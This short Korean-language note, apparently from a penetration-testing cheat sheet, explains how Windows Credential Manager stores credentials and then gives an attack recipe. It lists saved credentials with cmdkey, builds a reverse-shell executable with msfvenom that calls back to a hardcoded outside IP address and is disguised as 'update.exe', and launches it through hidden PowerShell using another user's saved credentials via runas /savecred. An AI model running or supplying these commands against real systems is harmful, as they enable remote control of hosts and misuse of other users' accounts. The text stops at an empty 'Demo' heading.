Credential Manager

Credential Manager는 Windows에서 사용자가 입력한 자격 증명을 기억하여 다음번 로그인 시, 자격 증명 입력을 하지 않더라도 서비스에 인증하고 사용할 수 있는 서비스입니다.

저장된 정보는 DPAPI로 관리되며 대표적인 예시로 RDP 연결 시 자격 증명 저장입니다.

RDP를 위해 로그인한 사용자의 자격 증명을 저장했다고 하더라도, 해당 정보가 반드시 RDP를 사용할 때만 사용할 수 있지는 않습니다. 어떤 서비스를 이용했건 정보는 자격 증명 관리자에 저장되며, 이 정보를 통해서 다른 서비스에 해당 사용자의 권한으로 접근하는 것이 가능합니다.

Abuse

# 저장된 자격 증명 열거
cmdkey /list

# 리버스쉘 실행 파일 생성 및 전달
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=222.112.24.168 LPORT=10002 -f exe -o update.exe

# 저장된 정보를 통해 서비스 이용
runas /user:mick3y /savecred "powershell.exe -WindowStyle Hidden -Command Start-Process 'C:\Users\Mick3y\update.exe'"

Demo